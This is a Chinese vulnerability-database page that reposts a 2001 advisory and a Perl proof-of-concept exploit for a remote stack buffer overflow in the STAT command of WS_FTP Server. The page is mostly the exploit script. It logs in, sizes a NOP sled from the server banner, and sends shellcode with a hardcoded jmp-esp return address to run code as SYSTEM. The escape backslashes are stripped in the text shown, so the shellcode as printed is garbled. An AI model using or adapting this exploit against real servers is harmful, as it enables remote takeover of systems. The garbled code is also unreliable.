Ipswitch WS_FTP Server 1.0.x/2.0.x – ‘STAT’ Remote Buffer Overflow
漏洞ID | 1053558 | 漏洞类型 | |
发布时间 | 2001-11-05 | 更新时间 | 2001-11-05 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/3507/info
WS_FTP Server, a popular FTP server for Microsoft Windows platforms, is vulnerable to a buffer overflow condition when a user submits a specially crafted legitimate FTP command. WS_FTP Server by default runs as a SYSTEM service.
If a logged in user submits a 'STAT' command along with arbitrary characters (approx 479 bytes) to a host running WS_FTP Server, this could result in the overwriting of stack variables, including the return address, and potentially the execution of arbitrary code with SYSTEM privileges.
#########################################################################
#
# WS_FTP Server 2.0.3 STAT proof-of-concept exploit
# By [email protected] (C)2001
#
#
# There are a couple of things screwing up this exploit. First, the
# total number of bytes we control in the area where ESP is pointing,
# corresponds to the number of bytes in the domain name. So, to make sure
# it works on as many systems as possible, Im only using 2 bytes here.
# So, we have to jump back through the buffer... Fun.. :)
# Second, the number of bytes needed to overwrite EIP is dependant on the
# number of bytes in the server name.
# Third, the stack has to be moved to the heap, because there is no
# good place on the stack, it just ends with CreateFile overwriting stuff.
#
# Im using a "jump esp" in shlwapi.dll(0x70beed87) as the return address,
# change this if it does not work on your system.
#
#########################################################################
$login="ftp"; #username
$pass="ftp"; #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.3 STAT proof-of-concept exploitn";
print "It creates a file named defcom.iyd in the c-rootn";
print "(C)2001 [email protected]";
print "Usage: $0 <host>n";
print "Example: $0 127.0.0.1n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
###########################################################################################
# get servername and length of domain
recv(SOCK,$reply,1024,0);
@split1 = split(/ /,$reply);
@split2 = split(/-/,$split1[0]);
$servername = $split2[1];
$pos = index($servername,".");
if ($pos == -1) { print "Error: Domain has to be atleast two characters"; exit; }
$domain = substr($servername,$pos);
if (length($domain) < 2) { print "Error: Domain has to be atleast two characters"; exit; }
###########################################################################################
sleep(1);
$msg = "user $loginn";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $passn";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit="xebx03x5axebx05xe8xf8xffxffxffx8bxc2x83xc0x1axebx02xebx80x33";
$sploit = $sploit . "xc9x66xb9xd6x80x66x81xf1x80x80x80x30x99x40xe2xfax12";
$sploit = $sploit . "x7bx1ax75x92x12x75xcbxf1x99x63x99x99xf1xd9x99x99x99";
$sploit = $sploit . "x27x45x8dxdcx99x66x8fxc3x9cx99x63x99x99x12x79x12x75";
$sploit = $sploit . "xaax59xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1a";
$sploit = $sploit . "x5bxfbxcbx27xbdx8cxdcx99x66x8fxaax59xc9x27x89x8fxdc";
$sploit = $sploit . "x99x66x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";
$msg = "stat " . "x90" x (480-length($sploit)-length($servername)) . $sploit . "x87xedxbex70" . "x90" x 16 . "xebx81" . "rn";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
exit;
相关推荐: Solaris PT_CHMOD Arbitrary Terminal Writing Vulnerability
Solaris PT_CHMOD Arbitrary Terminal Writing Vulnerability 漏洞ID 1102782 漏洞类型 Access Validation Error 发布时间 2001-11-08 更新时间 2001-11-0…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666